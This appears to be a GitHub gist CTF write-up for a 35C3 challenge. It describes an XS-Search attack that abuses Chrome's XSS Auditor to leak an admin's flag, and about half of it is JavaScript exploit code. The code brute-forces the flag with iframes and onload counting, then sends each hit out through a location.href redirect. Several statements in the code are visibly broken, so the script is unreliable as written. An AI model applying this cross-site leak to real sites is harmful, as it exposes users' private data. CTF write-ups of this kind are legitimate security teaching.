Skip to content

Instantly share code, notes, and snippets.


l4wio/go.html Secret

Last active September 3, 2019 01:38
What would you like to do?
Briefly, we all know that flag is stored as `file` in admin account. Plus, the flag is in the format: 35C3_***
When we searching content of a file, if it does exists, there is a script which doing highlight the found word by yellow <mark>
For example:
for (let pre of document.getElementsByTagName('pre')) {
let text = pre.innerHTML;
let q = 'def';
let idx = text.indexOf(q);
pre.innerHTML = `${text.substr(0, idx)}<mark>${q}</mark>${text.substr(idx+q.length)}`;
Okay, now let's go to XSS Auditor part.
Try this on Chrome (yea we should, since the description saying that the admin is using Chrome-headless)
You can see the red alert, which means that XSS-Auditor found a XSS vector on our URL (`a` param) which also showing in the page's content. But in fact, it's *NOT XSS* , this is side effect of the auditor
We leverage on its mechanism to detect whether there is search result (guessing flag) or not.
* To clarify: `a` is just foo parameter name, we just wanna make XSS-Auditor see it's as XSS vector.
But how do we do that ? Since XSS-Auditor will detect and block the page, redirect the page to `chrome-error://chromewebdata/` as well.
Now the trick comes by. by reading this post:
I found out, it's possible to detect if the browser redirects to other page.
Yep, and that's all.
We can guess the flag by performing XS-Search leverage on XSS-Auditor
var URL = '{{search}}&a=%3Cscript%3E%20%20%20%20%28%28%29%3d%3E%7b%0a%20%20%20%20%20%20for%20%28let%20pre%20of%20document%2egetElementsByTagName%28%27pre%27%29%29%20%7b%0a%20%20%20%20%20%20%20%20let%20text%20%3d%20pre%2einnerHTML%3b';
var charset = '_abcdefghijklmnopqrstuvwxyz0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ!"#$%&\'()*+,-./:;<=>?@[\\]^`{|}~';
var brute = new URLSearchParams('brute') || '35C3_';
function guess(i){
var go = brute + charset[i];
var x = document.createElement('iframe'); = 'blah';
var calls = 0;
x.onload = () => {
if(calls > 1){
// so here is calling 2nd onload which means the xss auditor blocking this and the page is redirected to chrome-error://
console.log("GO IT ==> ",go);
location.href = ''+escape(go);
x.onload = ()=>{};
var anchor = document.createElement('a'); =;
anchor.href = x.src+'#';;
anchor = null;
x.src = URL.replace('{{search}}',go);
setTimeout(() =>{
// FLAG: 35C3_xss_auditor_for_the_win
Copy link

Hic! Pro có thể nói rõ hơn đc không?? :)) Mong đc chỉ giáo :v

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment